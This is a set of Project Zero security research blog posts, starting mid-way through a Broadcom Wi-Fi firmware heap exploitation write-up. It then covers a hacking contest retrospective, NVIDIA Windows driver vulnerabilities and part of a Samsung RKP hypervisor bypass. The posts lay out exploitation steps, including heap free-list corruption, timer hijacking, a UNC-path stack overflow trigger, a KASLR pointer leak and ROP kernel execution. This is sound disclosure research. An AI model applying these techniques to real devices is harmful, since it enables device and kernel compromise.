When wpa_supplicant wishes to create and send TDLS frames, it does so by sending special requests over Netlink, which are then handled by the cfg80211 framework, and subsequently passed to the SoftMAC layer, “mac80211”. Regrettably, however, mac80211 is unable to process the special vendor frames, and simply rejects them. Nonetheless, this is just a minor inconvenience - I’ve written a few patches to mac80211 which add support for these special vendor frames. After applying these patches, re-compiling and booting the kernel, we are now able to send our crafted frames.
(schematic based on http://processors.wiki.ti.com/index.php/WL127x_WLAN_API_Information)
To allow for easier control over the vendor frames, I’ve also added support for a new command within wpa_supplicant’s CLI - “TDLS_VNDR”. This command allows us to send a crafted TDLS vendor frame with arbitrary data to any MAC address (regardless of whether a TDLS connection is established to that peer).Putting It All Together
After creating two overlapping chunks, we can now use our controlled allocation primitive to allocate memory from the tail of the larger chunk, thereby pointing the smaller free chunk at a location of our choosing. Whichever location we choose, however, must have valid values for both the  “size” and “next” fields, otherwise later calls to malloc and free may fail, possibly crashing the firmware. As a matter of fact, we’ve already seen perfect candidates to stand-in for free chunks - in-use chunks!
Recall that in-use chunks specify their size field at the same location free chunks do theirs. As for the “next” pointer, it is unused in free chunks, but is set to zero during the allocation of the chunk. This means that by corrupting the free list to point at an in-use chunk, we can trick the heap into thinking it’s just another free chunk, which is coincidentally also the last chunk in the freelist. That’s comfortable.

Now all we need to do is find an in-use chunk containing information that we’d like to overwrite. If we make that chunk the best-fitting chunk in the free list for a subsequent controlled allocation, we’ll get our own data to be allocated there instead of the in-use chunk’s data, effectively replacing the chunk’s contents. This means we’re able to arbitrarily replace the contents of any in-use chunk.
As we’re interested in achieving full code execution, it would be advantageous to locate and overwrite a function pointer in the heap. But… Where can we expect to find such values on the heap? Well, for starters, there are some events in the Wi-Fi standards that must be handled periodically, such as performing scans for adjacent networks. It would probably be a safe bet to assume that the firmware supports handling such periodic timers by using a common API.
Since timers may be created during the firmware’s operation, their data structures (e.g., which function to execute and when) must be stored on the heap. To locate these timers, we can reverse-engineer the IRQ vector table entry, and search for the logic corresponding to handling a timer interrupt. After doing so, we find a linked list of entries whose contents seem to conform to that of brcms_timer structure, used in the brcmsmac (SoftMAC) driver. After writing a short script, we can dump the list of timers given a RAM snapshot:

We can see that the timer list is ordered by the timeout value, and most of the timers have a relatively short timeout. Moreover, all the timers are allocated during the firmware’s initialisation, and are therefore stored at constant addresses. This is important since, if we’d like to target our free chunk at a timer, we’d need to know it’s exact location in memory.
So all that’s left is to use our two primitives to replace the contents of one of the timers above with our own data, consequently pointing the timer’s function at an address of our choosing.
Here’s the game plan. First, we’ll use the techniques described above to create two overlapping free chunks. Now, we can use the controlled allocation primitive to point the smaller free chunk at one of the timers in the list above. Next, we create another controlled allocation (freeing the old one). This one will be of size 0x3C, for which the timer chunk is the best-fitting. Therefore, at this point, we’ll overwrite the timer’s contents.

But which function do we point our timer to? Well, we can use the same trick to commandeer another in-use chunk on the heap, and overwrite its contents with our own shellcode. After briefly searching the heap, we come across a large chunk which simply contains console data during the chip’s boot sequence, and is then left allocated but unused. Not only is the allocation is fairly large (0x400 bytes), but it is also placed at a constant address (since it is allocated during the firmware’s initialisation sequence) - perfect for our exploit.
Lastly, how can we be sure that the contents of the heap is even executable? After all, the ARM Cortex R4 has a Memory Protection Unit (MPU). Unlike an MMU, it does not allow for the facilitation of a virtual address space, but it does allow control over the access permissions of different memory ranges in RAM. Using the MPU, the heap could (and should) be marked as RW and non-executable.
By reversing the firmware’s initialisation routines in the binary, we can see that the MPU is indeed being activated during boot. But what are the contents with which it’s configured? We can find out by writing a small assembly stub to dump out the contents of the MPU:
0x00000000 - 0x10000000AP: 3 - Full accessXN: 00x10000000 - 0x20000000AP: 3 - Full accessXN: 00x20000000 - 0x40000000AP: 3 - Full accessXN: 00x40000000 - 0x80000000AP: 3 - Full accessXN: 00x80000000 - 0x100000000AP: 3 - Full accessXN: 0
Ah-ha - while the MPU is initialised, it is effectively set to mark all of memory as RWX, making it useless. This saves us some hassle… We can conveniently execute our code directly from the heap.
So, at long last, we have an exploit ready! Putting it all together we can now hijack a code chunk to store our shellcode, then hijack a timer to point it at our stored shellcode. Once the timer expires, our code will be executed on the firmware!

At long last, we’ve gone through the entire process of researching the platform, discovering a vulnerability and writing a full-fledged exploit. Although this post is relatively long, there are many smaller details that I left out in favour of brevity. If you have any specific questions, please let me know. You can find the full exploit, including instructions, here. The exploit includes a relatively benign shellcode, which simply writes a magic value to address 0x200000 in the firmware’s RAM, signalling successful execution.Wrapping Up
We’ve seen that while the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security. Specifically, it lacks all basic exploit mitigations - including stack cookies, safe unlinking and access permission protection (by means of an MPU).
Broadcom have informed me that newer versions of the SoC utilise the MPU, along with several additional hardware security mechanisms. This is an interesting development and a step in the right direction. They are also considering implementing exploit mitigations in future firmware versions.
In the next blog post, we’ll see how we can use our assumed control of the Wi-Fi SoC in order to further escalate our privileges into the application processor, taking over the host’s operating system!
Categories: Security

Project Zero Prize Conclusion

Wed, 03/29/2017 - 14:12
Posted by Natalie Silvanovich, Project Zero
On September 13, 2016 we announced the Project Zero Prize. It concluded last week with no prizes awarded. The purpose of this post is to discuss what happened and what we learned about hacking contest design.
Throughout the contest, we did not receive any valid entries or bugs (everything we received was either spam, or did not remotely resemble a contest entry as described in the rules). We did hear from some teams and individuals who said they were working on the contest, but they did not submit any bugs or entries. Based on our discussions with them, as well as our general observations during the contest, we suspect that the following factors led to the lack of entries.Entry Point DifficultyIt is rare for fully remote Android bugs to be reported, and it is likely that this was a sticking point for participants. The majority of Android bug chains begin with some user interaction, especially clicking a link, which was not allowed in this contest. While this type of bug is not unheard of, it is likely difficult to find quality bugs in this area. This means that the timeframe of the contest or prize amount may not have been adequate to elicit this type of bug.Competing ContestsThe Project Zero Prize rules were intended to encourage participants to file partial bug chains in the Android bug tracker during the contest, even if a full chain was not complete. In designing these rules, we underestimated the impact of other contests on participants’ incentives. The contest rules allowed for bugs that had already been filed to be used by the first filer at any point during the contest, and receive Android Security Rewards if they were not used as a part of a chain.  We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common. Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.Prize AmountIt’s difficult to determine the right prize amount for this type of contest, and the fact that we did not receive any entries suggests that the prize amount might have been too low considering the type of bugs required to win this contest.
Overall, this contest was a learning experience, and we hope to put what we’ve learned to use in Google’s rewards programs and future contests. Stay tuned! Also, if there were any aspects of the Project Zero Prize that affected your participation that we could improve, we would like to hear from you, either in the comments, or at project-zero-prize@google.com.
Categories: Security

Attacking the Windows NVIDIA Driver

Tue, 02/14/2017 - 19:03
Posted by Oliver Chang
Modern graphic drivers are complicated and provide a large promising attack surface for EoPs and sandbox escapes from processes that have access to the GPU (e.g. the Chrome GPU process). In this blog post we’ll take a look at attacking the NVIDIA kernel mode Windows drivers, and a few of the bugs that I found. I did this research as part of a 20% project with Project Zero, during which a total of 16 vulnerabilities were discovered.Kernel WDDM interfacesThe kernel mode component of a graphics driver is referred to as the display miniport driver. Microsoft’s documentation has a nice diagram that summarises the relationship between the various components:

In the DriverEntry() for display miniport drivers, a DRIVER_INITIALIZATION_DATA structure is populated with callbacks to the vendor implementations of functions that actually interact with the hardware, which is passed to dxgkrnl.sys (DirectX subsystem) via DxgkInitialize(). These callbacks can either be called by the DirectX kernel subsystem, or in some cases get called directly from user mode code.DxgkDdiEscapeA well known entry point for potential vulnerabilities here is the DxgkDdiEscape interface. This can be called straight from user mode, and accepts arbitrary data that is parsed and handled in a vendor specific way (essentially an IOCTL). For the rest of this post, we’ll use the term “escape” to denote a particular command that’s supported by the DxgkDdiEscape function.
NVIDIA has a whopping 400~ escapes here at time of writing, so this was where I spent most of my time (the necessity of many of these being in the kernel is questionable):

// (names of these structs are made up by me)
// Represents a group of escape codes
struct NvEscapeRecord {
 DWORD action_num;
 DWORD expected_magic;
 void *handler_func;
 NvEscapeRecordInfo *info;
 _QWORD num_codes;
};

// Information about a specific escape code.
struct NvEscapeCodeInfo {
 DWORD code;
 DWORD unknown;
 _QWORD expected_size;
 WORD unknown_1;
};
NVIDIA implements their private data (pPrivateDriverData in the DXGKARG_ESCAPE struct) for each escape as a header followed by data. The header has the following format:
struct NvEscapeHeader {
 DWORD magic;
 WORD unknown_4;
 WORD unknown_6;
 DWORD size;
 DWORD magic2;
 DWORD code;
 DWORD unknown[7];
};
These escapes are identified by a 32-bit code (first member of the NvEscapeCodeInfo struct above), and are grouped by their most significant byte (from 1 - 9).
There is some validation being done before each escape code is handled. In particular, each NvEscapeCodeInfo contains the expected size of the escape data following the header. This is validated against the size in the NvEscapeHeader, which itself is validated against the PrivateDriverDataSize field given to DxgkDdiEscape. However, it’s possible for the expected size to be 0 (usually when the escape data is expected to be variable sized) which means that the escape handler is responsible for doing its own validation. This has led to some bugs (1, 2).
Most of the vulnerabilities found (13 in total) in escape handlers were very basic mistakes, such as writing to user provided pointers blindly, disclosing uninitialised kernel memory to user mode, and incorrect bounds checking. There were also numerous issues that I noticed (e.g. OOB reads) that I didn’t report because they didn’t seem exploitable.DxgkDdiSubmitBufferVirtualAnother interesting entry point is the DxgkDdiSubmitBufferVirtual function, which is newly introduced in Windows 10 and WDDM 2.0 to support GPU virtual memory (deprecating the old DxgkDdiSubmitBuffer/DxgkDdiRender functions). This function is fairly complicated, and also accepts vendor specific data from the user mode driver for each command submitted. One bug was found here.OthersThere are a few other WDDM functions that accept vendor-specific data, but nothing of interest were found in those after a quick review.Exposed devicesNVIDIA also exposes some additional devices that can be opened by any user:
  • \\.\NvAdminDevice which appears to be used for NVAPI. A lot of the ioctl handlers seem to call into DxgkDdiEscape.
  • \\.\UVMLite{Controller,Process*}, likely related to NVIDIA’s “unified memory”. 1 bug was found here.
  • \\.\NvStreamKms, installed by default as part of GeForce Experience, but you can opt out during installation. It’s not exactly clear why this particular driver is necessary. 1 bug was found here also.
More interesting bugsMost of the bugs I found were by manual reversing and analysis, along with some custom IDA scripts. I also ended up writing a fuzzer, which was surprisingly successful given how simple it was.
While most of the bugs were rather boring (simple cases of missing validation), there were a few that were a bit more interesting.NvStreamKmsThis driver registers a process creation notification callback using the PsSetCreateProcessNotifyRoutineEx function. This callback checks if new processes created on the system match image names that were previously set by sending IOCTLs.
This creation notification routine contained a bug:
(Simplified decompiled output)
wchar_t Dst[BUF_SIZE];

...

if ( cur->image_names_count > 0 ) {
 // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
 image_filename = info_->ImageFileName;
 buf = image_filename->Buffer;
 if ( buf ) {
   filename_length = 0i64;
   num_chars = image_filename->Length / 2;
   // Look for the filename by scanning for backslash.
   if ( num_chars ) {
     while ( buf[num_chars - filename_length - 1] != '\\' ) {
       ++filename_length;
       if ( filename_length >= num_chars )
         goto DO_COPY;
     }
     buf += num_chars - filename_length;
   }
DO_COPY:
   wcscpy_s(Dst, filename_length, buf);
   Dst[filename_length] = 0;
   wcslwr(Dst);
This routines extracts the image name from the ImageFileName member of PS_CREATE_NOTIFY_INFO by searching backwards for backslash (‘\’). This is then copied to a stack buffer (Dst) using wcscpy_s, but the length passed is the length of the calculated name, and not the length of the destination buffer.
Even though Dst is a fixed size buffer, this isn’t a straightforward overflow. Its size is bigger than 255 wchars, and for most Windows filesystems path components cannot be greater than 255 characters. Scanning for backslash is also valid for most cases because ImageFileName is a canonicalised path.
It is however, possible to pass a UNC path that keeps forward slash (‘/’) as the path separator after being canonicalised (credits to James Forshaw for pointing me to this). This means we can get a filename of the form “aaa/bbb/ccc/...” and cause an overflow.
For example: CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\aaaa/bbbb/cccc/blah.exe", …)
Another interesting note is that the wcslwr following the bad copy doesn’t actually limit the contents of the overflow (the only requirement is valid UTF-16). Since the calculated filename_length doesn’t include the null terminator, wcscpy_s will think that the destination is too small and will clear the destination string by writing a null byte at the beginning (after copying the contents up to filename_length bytes first so the overflow still happens). This means that the wcslwr is useless because this wcscpy_s call and part of the code never worked to begin with.
Exploiting this is trivial, as the driver is not compiled with stack cookies (hacking like it’s 1999). A local privilege escalation exploit is attached in the original issue that sets up a fake WebDAV server to exploit the vulnerability (ROP, pivot stack to user buffer, ROP again to allocate rwx mem containing shellcode and jump to it).Incorrect validation in UVMLiteControllerNVIDIA’s driver also exposes a device at \\.\UVMLiteController that can be opened by any user (including from the sandboxed Chrome GPU process). The IOCTL handlers for this device write results directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl (Microsoft’s documentation  says not to do this).The IO control codes specify METHOD_BUFFERED, which means that the Windows kernel checks that the address range provided is writeable by the user before passing it off to the driver.
However, these handlers lacked bounds checking for the output buffer, which means that a user mode context could pass a length of 0 with any arbitrary address (which passes the ProbeForWrite check) to result in a limited write-what-where (the “what” here is limited to some specific values: including 32-bit 0xffff, 32-bit 0x1f, 32-bit 0, and 8-bit 0).
A simple privilege escalation exploit is attached in the original issue. Remote attack vector?Given the quantity of bugs that were discovered, I investigated whether if any of them can be reached from a completely remote context without having to compromise a sandboxed process first (e.g. through WebGL in a browser, or through video acceleration).
Luckily, this didn’t appear to be the case. This wasn’t too surprising, given that the vulnerable APIs here are very low level and only reached after going through many layers (for Chrome, libANGLE -> Direct3D runtime and user mode driver -> kernel mode driver), and generally called with valid arguments constructed in the user mode driver.NVIDIA’s responseThe nature of the bugs found showed that NVIDIA has a lot of work to do. Their drivers contained a lot of code which probably shouldn’t be in the kernel, and most of the bugs discovered were very basic mistakes. One of their drivers (NvStreamKms.sys) also lacks very basic mitigations (stack cookies) even today.
However, their response was mostly quick and positive. Most bugs were fixed well under the deadline, and it seems that they’ve been finding some bugs on their own internally. They also indicated that they’ve been working on re-architecturing their kernel drivers for security, but weren’t ready to share any concrete details.Timeline2016-07-26First bug reported to NVIDIA.2016-09-216 of the bugs reported were fixed silently in the 372.90 release. Discussed patch gap issues with NVIDIA.2016-10-23Patch released that includes fix for rest (all 14) of the bugs that were reported at the time (375.93).2016-10-28Public bulletin released, and P0 bugs derestricted.2016-11-04 Realised that https://bugs.chromium.org/p/project-zero/issues/detail?id=911 wasn’t fixed properly. Notified NVIDIA. 2016-12-14Fix for issue 911 released along with bulletin.2017-02-14Final two bugs fixed.
Patch gapNVIDIA’s first patch, which included fixes to 6 of the bugs I reported, did not include a public bulletin (the release notes mention “security updates”). They had planned to release public details a month after the patch is released. We noticed this, and let them know that we didn’t consider this to be good practice as an attacker can reverse the patch to find the vulnerabilities before the public is made aware of the details given this large window.
While the first 6 bugs fixed did not have details released for more than 30 days, the remaining 8 at the time had a patch released 5 days before the first bulletin was released. It looks like NVIDIA has been trying to reduce this gap, but based on recent bulletins it appears to be inconsistent.ConclusionGiven the large attack surface exposed by graphics drivers in the kernel and the generally lower quality of third party code, it appears to be a very rich target for finding sandbox escapes and EoP vulnerabilities. GPU vendors should try to limit this by moving as much attack surface as they can out of the kernel.
Categories: Security

Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection

Wed, 02/08/2017 - 12:24
Posted by Gal Beniamini, Project Zero
Traditionally, the operating system’s kernel is the last security boundary standing between an attacker and full control over a target system. As such, additional care must be taken in order to ensure the integrity of the kernel. First, when a system boots, the integrity of its key components, including that of the operating system’s kernel, must be verified. This is achieved on Android by the verified boot chain. However, simply booting an authenticated kernel is insufficient—what about maintaining the integrity of the kernel while the system is executing?
Imagine a scenario where an attacker is able to find and exploit a vulnerability in the operating system’s kernel. Using such a vulnerability, the attacker may attempt to subvert the integrity of the kernel itself, either by modifying the contents of its code, or by introducing new attacker-controlled code and running it within the context of the operating system. Even more subtly, the attacker may choose to modify the data structures used by the operating system in order to alter its behaviour (for example, by granting excessive rights to select processes). As the kernel is in charge of managing all memory translations, including its own, there is no mechanism in place preventing an attacker within the same context from doing so.
However, in keeping with the concept of “defence in depth”, additional layers may be added in order to safeguard the kernel against such would-be attackers. If stacked correctly, these layers may be designed in such a way which either severely limits or simply prevents an attacker from subverting the kernel’s integrity.
In the Android ecosystem, Samsung provides a security hypervisor which aims to tackle the problem of ensuring the integrity of the kernel during runtime. The hypervisor, dubbed “Real-Time Kernel Protection” (RKP), was introduced as part of Samsung KNOX. In this blog post we’ll take an in-depth look at the inner-working of RKP and present multiple vulnerabilities which allowed attackers to subvert each of RKP’s security mechanisms. We’ll also see how the design of RKP could be fortified in order to prevent future attacks of this nature, making exploitation of RKP much harder.
As always, all the vulnerabilities in this article have been disclosed to Samsung, and the fixes have been made available in the January SMR.
I would like to note that in addition to addressing the reported issues, the Samsung KNOX team has been extremely helpful and open to discussion. This dialogue helped ensure that the issues were diagnosed correctly and the root causes identified. Moreover, the KNOX team has reviewed this article in advance, and have provided key insights into future improvements planned for RKP based on this research.
I would especially like to thank Tomislav Suchan from the Samsung KNOX team for helping address every single query I had and for providing deep insightful responses. Tomislav’s hard work ensured that all the issues were addressed correctly and fully, leaving no stone unturned.HYP 101
Before we can start exploring the architecture of RKP, we first need a basic understanding of the virtualisation extensions on ARMv8. In the ARMv8 architecture, a new concept of exception levels was introduced. Generally, discrete components run under different exception levels - the more privileged the component, the higher its exception level.

In this blog post we’ll only focus on exception levels within the “Normal World”. Within this context, EL0 represents user-mode processes running on Android, EL1 represents Android’s Linux kernel, and EL2 (also known as “HYP” mode) represents the RKP hypervisor.
Recall then when user-mode processes (EL0) wish to interact with the operating system’s kernel (EL1), they must do so by issuing “Supervisor Calls” (SVCs), triggering exceptions which are then handled by the kernel. Much in the same way, interactions with the hypervisor (EL2) are performed by issuing “Hypervisor Calls” (HVCs).
Additionally, the hypervisor may control key operations that are performed within the kernel, by using the “Hypervisor Configuration Register” (HCR). This register governs over the virtualisation features that enable EL2 to interact with code running in EL1. For example, setting certain bits in the HCR will cause the hypervisor to trap specific operations which would normally be handled by EL1, enabling the hypervisor to choose whether to allow or disallow the requested operation.
Lastly, the hypervisor is able to implement an additional layer of memory translation, called a “stage 2 translation”. Instead of using the regular model where the operating system’s translation table maps between virtual addresses (VAs) and physical addresses (PAs), the translation process is split in two.
First, the EL1 translation tables are used in order to map a given VA to an intermediate physical address (IPA) - this is called a “stage 1 translation”. In the process, the access controls present in the translation are also applied, including access permission (AP) bits, execute never (XN) and privileged execute never (PXN).
Then, the resulting IPA is translated to a PA by performing a “stage 2 translation”. This mapping is performed by using a translation table which is accessible to EL2, and is inaccessible to code running in EL1. By using this 2-stage translation regime, the hypervisor is able to prevent access to certain key regions of physical memory, which may contain sensitive data that should be kept secret from EL1.
Creating a Research Platform
As we just saw in our “HYP 101” lesson, communicating with EL2 explicitly is done by issuing HVCs. Unlike SVCs which may be freely issued by code running in EL0, HVCs can only be triggered by code running in EL1. Since RKP runs in EL2 and exposes the vast majority of its functionality by means of commands which can be triggered from HVCs, we first need a platform from which we are able to send arbitrary HVCs.
Fortunately, in a recent blog post, we already covered an exploit that allowed us to elevate privileges into the context of system_server. This means that all that’s left before we can start investigating RKP and interacting with EL2, is to find an additional vulnerability that allows escalation from an already privileged context (such as system_server), to the context of the kernel.
Luckily, simply surveying the attack surface exposed to such privileged contexts revealed a vast amount of relatively straightforward vulnerabilities, any of which could be used to gain some foothold in EL1. For the purpose of this research, I’ve decided to exploit the most convenient of these: a simple stack overflow in a sysfs entry, which could be used to gain arbitrary control over the stack contents for a kernel thread. Once we have control over the stack’s contents, we can construct a ROP payload that prepares arguments for a function call in the kernel, calls that function, and returns the results back to user-space.

In order to ease exploitation, we can wrap the entire process of creating a ROP stack which calls a kernel function and returns the results to user-space, into a single function, which we’ll call “execute_in_kernel”. Combined with our shellcode wrapper, which converts normal-looking C code to shellcode that can be injected into system_server, we are now able to freely construct and run code which is able to invoke kernel functions on demand.


Putting it all together, we can start investigating and interacting with RKP using this robust research platform. The rest of the research detailed in this blog post was conducted on a fully updated Galaxy S7 Edge (SM-G935F, XXS1APG3, Exynos chipset), using this exact framework in order to inject code into system_server using the first exploit, and then run code in the kernel using the second exploit.
Finally, now that we’ve laid down all the needed foundations, let’s get cracking!Mitigation #1 - KASLR
With the introduction of KNOX v2.6, Samsung devices implement Kernel Address Space Layout Randomisation (KASLR). This security feature introduces a random “offset”, generated each time the device boots, by which the base address of the kernel is shifted. Normally, the kernel is loaded into a fixed physical address, which corresponds to a fixed virtual address in the VAS of the kernel. By introducing KASLR, all the kernel’s memory, including its code, is shifted by this randomised offset (also known as a “slide”).
While KASLR may be a valid mitigation against remote attackers aiming to exploit the kernel, it is very hard to implement in a robust way against local attackers. In fact, there has been some very interesting recent research on the subject which manages to defeat KASLR without requiring any software bug (e.g., by observing timing differences).
While those attacks are quite interesting in their own right, it should be noted that bypassing KASLR can often be achieved much more easily. Recall that the entire kernel is shifted by a single “slide” value - this means that leaking any pointer in the kernel which resides at a known offset from the kernel’s base address would allow us to easily calculate the slide’s value.
The Linux kernel does include mechanisms intended to prevent the leakage of such pointers to user-space. One such mitigation is enforced by ensuring that every time a pointer’s value is written by the kernel, it is printed using a special format specifier: “%pK”. Then, depending on the value of kptr_restrict, the kernel may anonymise the printed pointer. In all Android devices that I’ve encountered, kptr_restrict is configured correctly, indeed ensuring the “%pK” pointers are anonymised.
Be that as it may, all we need is to find a single pointer which a kernel developer neglected to anonymise. In Samsung’s case, this turned out to be rather amusing… The pm_qos debugfs entry, which is readable by system_server, included the following code snippet responsible for outputting the entry’s contents:
static void pm_qos_debug_show_one(struct seq_file *s, struct pm_qos_object *qos)
{
   struct plist_node *p;
   unsigned long flags;

   spin_lock_irqsave(&pm_qos_lock, flags);

   seq_printf(s, "%s\n", qos->name);
   seq_printf(s, "   default value: %d\n", qos->constraints->default_value);
   seq_printf(s, "   target value: %d\n", qos->constraints->target_value);
   seq_printf(s, "   requests:\n");
   plist_for_each(p, &qos->constraints->list)
       seq_printf(s, "      %pk(%s:%d): %d\n",
                     container_of(p, struct pm_qos_request, node),
                     (container_of(p, struct pm_qos_request, node))->func,
                     (container_of(p, struct pm_qos_request, node))->line,
                     p->prio);

   spin_unlock_irqrestore(&pm_qos_lock, flags);
}
Unfortunately, the anonymisation format specifier is case sensitive… Using a lowercase “k”, like the code above, causes the code above to output the pointer without applying the anonymisation offered by “%pK” (perhaps this serves as a good example of how fragile KASLR is). Regardless, this allows us to simply read the contents of pm_qos, and subtract the pointer’s value from it’s known offset from the kernel’s base address, thus giving us the value of the KASLR slide.
Mitigation #2 - Loading Arbitrary Kernel Code
Preventing the allocation of new kernel code is one of the main mitigations enforced by RKP. In addition, RKP aims to protect all existing kernel code against modification. These mitigations are achieved by enforcing the following set of rules:
  1. All pages, with the exception of the kernel’s code, are marked as “Privileged Execute Never” (PXN)
  2. Kernel data pages are never marked executable
  3. Kernel code pages are never marked writable
  4. All kernel code pages are marked as read-only in the stage 2 translation table
  5. All memory translation entries (PGDs, PMDs and PTEs) are marked as read-only for EL1

While these rules appear to be quite robust, how can we be sure that they are being enforced correctly? Admittedly, the rules are laid out nicely in the RKP documentation, but that’s not a strong enough guarantee...
Instead of exercising trust, let’s start by challenging the first assertion; namely, that with the exception of the kernel’s code, all other pages are marked as PXN. We can check this assertion by looking at the stage 1 translation tables in EL1. ARMv8 supports the use of two translation tables in EL1, TTBR0_EL1 and TTBR1_EL1. TTBR0_EL1 is used to hold the mappings for user-space’s VAS, while TTBR1_EL1 holds the kernel’s global mappings.
In order to analyse the contents of the EL1 stage 1 translation table used by the kernel, we’ll need to first locate the physical address of the translation table itself. Once we find the translation table, we can use our execute_in_kernel primitive in order to iteratively execute a “read gadget” in the kernel, allowing us to read out the contents of the translation table.
There is one tiny snag, though - how will we be able to retrieve the location of the translation table? To do so, we’ll need to find a gadget which allows us to read TTBR1_EL1 without causing any adverse effects in the kernel.
Unfortunately, combing over the kernel’s code reveals a depressing fact - it seems as though such gadgets are quite rare. While there are some functions that do read TTBR1_EL1, they also perform additional operations, resulting in unwanted side effects. In contrast, RKP’s code segments seem to be rife with such gadgets - in fact, RKP contains small gadgets to read and write nearly every single control register belonging to EL1.
Perhaps we could somehow use this fact to our advantage? Digging deeper into the kernel’s code (init/main.c) reveals that rather perplexingly, on Exynos devices (as opposed to Qualcomm-based devices) RKP is bootstrapped by the EL1 kernel. This means that instead of booting EL2 directly from EL3, it seems that EL1 is booted first, and only then performs some operations in order to bootstrap EL2.
This bootstrapping is achieved by embedding the entire binary containing RKP’s code in the EL1 kernel’s code segment. Then, once the kernel boots, it copies the RKP binary to a predefined physical range and transitions to TrustZone in order to bootstrap and initialise RKP.

By embedding the RKP binary within the kernel’s text segment, it becomes a part of the memory range executable from EL1. This allows us to leverage all of the gadgets in the embedded RKP binary - making life that much easier.
Equipped with this new knowledge, we can now create a small program which reads the location of the stage 1 translation table using the gadgets from the RKP binary directly in EL1, and subsequently dumps and parses the table’s contents. Since we are interested in bypassing the code loading mitigations enforced by RKP, we’ll focus on the physical memory ranges containing the Linux kernel. After writing and running this program, we are faced with the following output:
...
[256] L1 table [PXNTable: 0, APTable: 0]
 [  0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
 [  1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
 [  2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
 [  3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
 [  4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
 [  5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
 [  6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
 [  7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
 [  8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
 [  9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
 [ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
As we can see above, the entire physical memory range [0x80000000, 0x81400000] is mapped in the stage 1 translation table using first level “Section” descriptors, each of which is responsible for translating a 1MB range of memory. We can also see that, as expected, this range is marked UXN and non-PXN - therefore EL1 is allowed to execute memory in these ranges, while EL0 is prohibited from doing so. However, much more surprisingly, the entire range is marked with access permission (AP) bit values of “00”. Let’s consult the ARM VMSA to see what these values indicate:


Aha - so in fact this means that these memory ranges are also readable and writable from EL1! Combining all this together, we reach the conclusion that the entire physical range of [0x80000000, 0x81400000] is mapped as RWX in the stage 1 translation table.
This still doesn’t mean we can modify the kernel’s code. Remember, RKP enforces the stage 2 memory translation as well. These memory ranges could well be restricted in the stage 2 translation in order to prevent attackers from gaining write access to them.
After some reversing, we find that RKP’s initial stage 2 translation table is in fact embedded in the RKP binary itself. This allows us to extract its contents and to analyse it in detail, similar to our previous work on the stage 1 translation table.

I’ve written a python script which analyses a given binary blob according to the stage 2 translation table’s format specified in the ARM VMSA. Next, we can use this script in order to discover the memory protections enforced by RKP on the kernel’s physical address range:
...0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...
First of all, we can see that the stage 2 translation table used by RKP maps every IPA to the same PA. As such, we can safely ignore the existence of IPAs for the remainder of this blog post and focus of PAs instead.
More importantly, however, we can see that our memory range of interest is not marked as XN, as is expected. After all, the kernel should be executable by EL1. But bafflingly, the entire range is marked with the stage 2 access permission (S2AP) bits set to “11”. Once again, let’s consult the ARM VMSA:
So this seems a little odd… Does this mean that the entire kernel’s code range is marked as RWX in both the stage 1 and the stage 2 translation table? That doesn’t seem to add up. Indeed, trying to write to memory addresses containing EL1 kernel code results in a translation fault, so we’re definitely missing something here.
Ah, but wait! The stage 2 translation tables that we’ve analysed above are simply the initial translation tables which are used when RKP boots. Perhaps after the EL1 kernel finishes its initialisation it will somehow request RKP to modify these mappings in order to protect its own memory ranges.
Indeed, looking once again at the kernel’s initialisation routines, we can see that shortly after booting, the EL1 kernel calls into RKP:
static void rkp_init(void)
{
rkp_init_t init;
init.magic = RKP_INIT_MAGIC;
init.vmalloc_start = VMALLOC_START;
init.vmalloc_end = (u64)high_memory;
init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
init.id_map_pgd = (u64)__pa(idmap_pg_dir);
init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
init.zero_pg_addr = page_to_phys(empty_zero_page);
init._text = (u64) _text;
init._etext = (u64) _etext;
if (!vmm_extra_mem) {
printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
return;
}
init.extra_memory_addr = __pa(vmm_extra_mem);
init.extra_memory_size = 0x600000;
init._srodata = (u64) __start_rodata;
init._erodata =(u64) __end_rodata;
init.large_memory = rkp_support_large_memory;

rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
rkp_started = 1;
return;
}
On the kernel’s side we can see that this command provides RKP with many of the memory ranges belonging to the kernel. In order to figure out the implementation of this command, let’s shift our focus back to RKP. By reverse engineering the implementation of this command within RKP, we arrive at the following approximate high-level logic:
void handle_rkp_init(...) {
   ...
   void* kern_text_phys_start = rkp_get_pa(text);
   void* kern_text_phys_end = rkp_get_pa(etext);
   rkp_debug_log("DEFERRED INIT START", 0, 0, 0);

